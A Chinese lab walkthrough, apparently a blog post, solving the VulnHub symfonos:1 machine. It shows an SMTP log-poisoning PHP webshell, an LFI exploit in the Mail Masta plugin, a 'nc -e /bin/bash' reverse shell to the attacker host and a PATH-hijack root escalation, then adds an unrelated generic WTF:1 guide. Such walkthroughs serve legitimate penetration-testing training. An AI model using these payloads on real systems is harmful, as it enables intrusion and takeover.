symfonos: 1靶场

symfonos: 1

来自 <https://www.vulnhub.com/entry/symfonos-1,322/>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.252

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.252

端口/服务

版本/信息

潜在漏洞/风险

建议步骤

优先级

22/SSH

OpenSSH 7.4p1 (Debian)

可能存在已知漏洞(如CVE-2018-15485),需凭证或私钥访问。

1. 弱密码爆破(hydra)。

2. 后续若获取凭证,尝试登录。

25/SMTP

Postfix

支持VRFY命令,可枚举有效用户。

1. 使用smtp-user-enum或手动验证用户。

2. 结合枚举结果进行SSH/SMB爆破。

80/HTTP

Apache 2.4.25

网页内容未知,可能存在目录遍历、敏感文件或Web漏洞(如文件包含)。

1. 访问页面分析源码。

2. 目录爆破(gobuster)。

3. 检查SQL注入/XSS等漏洞。

139,445/SMB

Samba 4.5.16-Debian

1. 允许匿名访问(Guest)。

2. 潜在漏洞CVE-2017-7494(需可写共享)。

1. 枚举共享(smbclient -L)。

2. 匿名访问检查文件。

3. 若可写共享,尝试利用CVE-2017-7494。

系统信息

Linux 3.x-4.x (Debian 9?)

旧内核可能未修补漏洞(如DirtyCow)。

1. 提权时检查内核漏洞。

2. 结合其他服务漏洞提升权限。

4,看看SMTP服务的共享资源

登录匿名用户进去,然后信息收集

smbclient //192.168.23.252/anonymous

get attention.txt

由此信息收集得到三个密码epidioko/qwerty/baseball。再访问helios用户的共享资源,经过测试发现helios用户的密码为qwerty。然后登录进去

smbclient //192.168.23.252/helios -U helios

todo.txt发现重要线索

Binge watch Dexter

Dance

Work on /h3l105

5,然后再访问一下80端口的http服务

http://192.168.23.252/h3l105/

需要修改一下域名文件

echo "192.168.23.252 symfonos.local" >>/etc/hosts

http://symfonos.local/h3l105/

扫描网站指纹目录

whatweb -v http://symfonos.local/h3l105/

发现CMS是wordpress,版本是5.2.2

使用wpscan扫描这个网站,发现网站安装了两个插件

wpscan --url http://symfonos.local/h3l105/

然后就搜索这个插件的漏洞

searchsploit mail masta 1

存在文件包含漏洞,将40290.txt下载到本地,查看漏洞描述

searchsploit  -m 40290.txt

WordPress插件 Mail Masta 本地文件包含(LFI)

影响版本: 插件版本未知(需验证)

漏洞类型: 未授权本地文件包含(通过pl参数)

风险等级: 高危

漏洞文件:

  • /inc/campaign/count_of_send.php
  • /inc/lists/csvexport.php
    漏洞原理
  1. 漏洞代码
    include($_GET['pl']); 
    // 直接使用未过滤的GET参数包含文件
  2. 触发条件
    攻击者通过
    pl参数指定任意文件路径,服务器未校验输入,直接包含该文件。
  3. 利用限制
    • 需知道目标服务器文件路径(如/etc/passwd)。
    • PHP配置需允许包含本地文件(allow_url_include=Off时仍可包含本地文件)。

漏洞利用步骤

1. 确认插件存在

访问以下路径,确认插件是否安装:

http://目标IP/wp-content/plugins/mail-masta/

若返回404403,说明插件不存在;若返回200或目录列表,则存在漏洞。

2. 尝试读取敏感文件

  • 通过pl参数读取系统文件(如/etc/passwd):

http://目标IP/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

http://目标IP/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd

  • 预期结果

返回/etc/passwd文件内容(需确保Web进程有读取权限)。

3. 进阶利用

6,然后尝试漏洞利用读取文件

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd

前面发现网站的web服务器软件是apache,尝试去包含apache的默认日志文件

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/log/apache2/access.log

看到包含失败。前面信息收集发现靶机还开放了smtp服务,尝试去包含helios用户的邮件日志

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

包含成功,现在可以使用telnet向helios用户发送植入了一句话木马的文件,然后再利用LFI给WEB网站构造RCE漏洞

telnet 192.168.23.252 25

MAIL FROM: icepeak
RCPT TO: helios
data
<?php system($_GET['cmd']); ?>
.
QUIT

然后就是测试网站漏洞是否构造成功

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id

漏洞利用成功,接下来尝试反弹shell

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc%20-e%20/bin/bash%20192.168.23.182%204444

与此同时kali开启对4444端口的监听

python -c 'import pty;pty.spawn("/bin/bash")'

7,信息收集一下

uname -a

lsb_release -a

sudo -l被禁用,再看看suid权限提权利用

find / -perm -u=s -type f 2>/dev/null

查看一个比较特殊的文件,/opt/statuscheck

strings /opt/statuscheck

分析结果:/opt/statuscheck 文件内容解析

1. 文件基本信息

  • 文件类型: 64位Linux可执行文件(ELF)
  • 编译环境: 使用GCC 6.3.0在Debian 9系统编译
  • 依赖库: 依赖libc.so.6(GNU C库),调用system函数执行系统命令

2. 关键字符串分析

  • curl -I H 与 http://lHocalhostH:
    实际应为 
    curl -I http://localhost 程序可能通过system执行此命令,用于检查本地HTTP服务状态(返回HTTP头信息)
  • system函数调用: 表明程序可能直接执行系统命令,存在潜在命令注入风险

8,发现该程序调用了curl,那么我们可以建一个假的curl,追加/tmp到环境变量开头,这样系统调用curl的时候就可以执行假的curl,进而达到提权效果

cd /tmp

echo "/bin/sh" > curl

chmod 777 curl

export PATH=/tmp:$PATH

echo $PATH

/opt/statuscheck

提权成功,成功变成root用户

cat /root/proof.txt

### 关于VulnHub上WTF:1靶场的使用指南 #### 初始设置与环境准备 为了开始探索和利用WTF:1靶场,首先需要下载并配置虚拟机镜像。此过程可以通过访问[VulnHub](https://www.vulnhub.com/)来完成,在网站中搜索"WTF:1"以获取具体的下载链接[^2]。 #### 渗透测试流程概述 一旦成功部署了WTF:1虚拟机,可以按照以下思路来进行渗透测试: - **信息收集阶段** 开始时应进行全面的信息搜集工作,包括但不限于网络扫描、服务枚举和服务版本识别等操作。Nmap是一个非常有用的工具用于初步探测目标系统的开放端口和服务情况。 - **漏洞分析阶段** 基于前期获得的情报数据,进一步深入研究可能存在的安全弱点。对于Web应用程序而言,OWASP Top Ten中的常见问题值得特别关注;而对于操作系统层面,则需留意已知的安全缺陷以及不当权限配置等问题。 - **攻击实施阶段** 当发现潜在可被利用的漏洞之后,便可以选择适当的方法尝试突破防线。例如,如果存在弱密码保护的服务账号,那么借助如Hydra这样的暴力破解工具配合高质量的字典文件(比如来自[SecLists项目][^3]),或许能够取得意想不到的效果。 - **后渗透活动** 成功获取到一定级别的控制权以后,继续挖掘更高层次的特权提升机会至关重要。针对Linux系统来说,`sudoers`文件错误配置或是特定命令未正确限制执行范围等情况都可能是实现提权的关键所在[^4]。 #### 实际案例解析 具体到本实例中提到的内容,当遇到涉及ROT编码的情况时,考虑到ROT13是一种简单的替换型加密方式,可以直接通过专门设计用来处理这类变换的在线平台快速得到明文形式的数据[^5]。 ```bash curl http://example.com/encoded.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m' ``` 上述脚本展示了如何利用Unix/Linux下的标准实用程序`tr`来手动解码一段经过ROT13转换后的字符串。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值